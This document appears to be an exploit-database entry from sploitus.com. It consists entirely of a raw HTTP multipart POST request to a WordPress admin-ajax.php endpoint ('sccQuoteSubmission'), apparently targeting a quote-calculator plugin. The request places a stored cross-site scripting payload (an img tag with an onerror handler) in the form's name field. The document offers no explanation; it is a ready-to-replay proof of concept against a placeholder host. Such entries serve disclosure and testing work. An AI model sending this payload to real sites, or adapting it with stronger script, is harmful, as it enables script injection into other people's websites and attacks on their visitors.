Share
## https://sploitus.com/exploit?id=WPEX-ID:73353221-3E6D-44E8-BF41-55A0FE57D81F
POST /wp-admin/admin-ajax.php HTTP/2
Host: {host_here}
Content-Length: 3486
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZd2EwaHqKpbMHz57
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://{host_here}
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://{host_here}
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="action"

sccQuoteSubmission
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="data"

[["name","flav<img src=x onerror=alert('xss')>"],["email","flaviu@engineer.com"],["phone","0742331337"],["g-recaptcha-response","03AFY_a8WYO44HYrIQz9Blk3_IBcdKUHEp_HJ8IJrUv1XKYTBMhbWfuX1tvUthoTidzvjr-Q7D6LtHgEQzVNSIZm_S2YBQCA4DO2NWlKMZ2mMjPYjGxE4eeJD4PNO1nF8Odj0B9uy8w7Iy3FZyCV5FS-82pi75YCg5ypfbMNjrmaGy38WUqxUVKBe7uEOgqYsT8QEc6BfZK3I6mVYKtSIim4b-QkVDd9OuWceOZqzrhMKSb7F9O-QI_AE1qgjr8eHYklyd75Ji-ozK45AknebATX3W1hSOZ0w5Rbs8IRH5F0HYfnPaDpoicIwDM84x_hwCxUqD3y_RXxXxDzK4txVajWTWzKJo93guG63OLyd1tR7ea8BdmGe-EZFVdmy61jT-LG4x6NQVVCTmT71o4fqpezo-IFxRcbH-L-sIAGNNDDZDIf5yJcfguxJVZ30SYOekCaAmlrIr1BtLIL3O9fzJda_yu-gXPCi-qf_I4I7STC8FStVNIuoH4AMZAadeizJYnpgrn4srZ_t0"]]
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="quote_data"

eyJyZWZlcmVyIjoiaHR0cHM6Ly97aG9zdF9oZXJlfS8iLCJwZGYiOnsiYmFubmVyX2ltYWdlIjoiIiwiZGF0ZSI6IjAzLzAyLzIwMjMiLCJkZXNjcmlwdGlvbiI6IkRlc2NyaXB0aW9uIiwiZm9vdGVyIjoiVGVybXMgYW5kIGNvbmRpdGlvbnMgYXBwbHkuIGh0dHBzOi8ve2hvc3RfaGVyZX0vdGVybXMtYW5kLWNvbmRpdGlvbnMiLCJsb2dvX2ltYWdlIjoiaHR0cHM6Ly97aG9zdF9oZXJlfS93cC1jb250ZW50L3VwbG9hZHMvMjAyMi8xMi9sb2dvLnBuZyIsInBkZl90aXRsZSI6Int0aXRsZX0iLCJwcmljZSI6IlByaWNlIiwicXVhbnRpdHkiOiJRdWFudGl0eSIsInVuaXQiOiJVbml0IFByaWNlIiwiaGFzVGF4IjpmYWxzZSwidGF4QW1vdW50IjpudWxsLCJ0YXhQYXJjZW50IjowLCJzdWJUb3RhbEJlZm9yZVRheCI6MTAsInJvd3MiOlt7InNlY3Rpb25fdGl0bGUiOiJQYWdlcyIsInR5cGUiOiJzZWN0aW9uX3RpdGxlIiwic2hvd1NlY3Rpb25Ub3RhbE9uUGRmIjpmYWxzZX0seyJ0eXBlIjoiZWxlbWVudCIsImF0dHIiOnsibmFtZSI6IiIsInRvdGFsX3ByaWNlIjoiwqMxMCIsInVuaXQiOjEsInVuaXRfcHJpY2UiOiLCozEwIiwidmFsdWUiOjEwLCJ3b29fY29tbWVyY2UiOnsicHJvZHVjdF9pZCI6MCwicXVhbnRpdHkiOjF9LCJudW1lcmljX3ZhbHVlIjoxMH19LHsidHlwZSI6InRvdGFsIiwiYXR0ciI6eyJwcmljZSI6IsKjMTAiLCJ0aXRsZSI6IlRvdGFsIFByaWNlIiwibnVtZXJpY192YWx1ZSI6MTB9fV0sInRvdGFsIjoxMH19
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="calcId"

12
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="captchaResponse"

03AFY_a8WYO44HYrIQz9Blk3_IBcdKUHEp_HJ8IJrUv1XKYTBMhbWfuX1tvUthoTidzvjr-Q7D6LtHgEQzVNSIZm_S2YBQCA4DO2NWlKMZ2mMjPYjGxE4eeJD4PNO1nF8Odj0B9uy8w7Iy3FZyCV5FS-82pi75YCg5ypfbMNjrmaGy38WUqxUVKBe7uEOgqYsT8QEc6BfZK3I6mVYKtSIim4b-QkVDd9OuWceOZqzrhMKSb7F9O-QI_AE1qgjr8eHYklyd75Ji-ozK45AknebATX3W1hSOZ0w5Rbs8IRH5F0HYfnPaDpoicIwDM84x_hwCxUqD3y_RXxXxDzK4txVajWTWzKJo93guG63OLyd1tR7ea8BdmGe-EZFVdmy61jT-LG4x6NQVVCTmT71o4fqpezo-IFxRcbH-L-sIAGNNDDZDIf5yJcfguxJVZ30SYOekCaAmlrIr1BtLIL3O9fzJda_yu-gXPCi-qf_I4I7STC8FStVNIuoH4AMZAadeizJYnpgrn4srZ_t0
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="disableUnitColumn"

false
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="showFormInDetail"

false
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="quoteRecipient"

1
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="emailValidationToken"

email_temp_r9UGTEn0Qz
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="nonce"

1c6a03bebd
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="sendQuoteFormDataToUser"

1
------WebKitFormBoundaryZd2EwaHqKpbMHz57--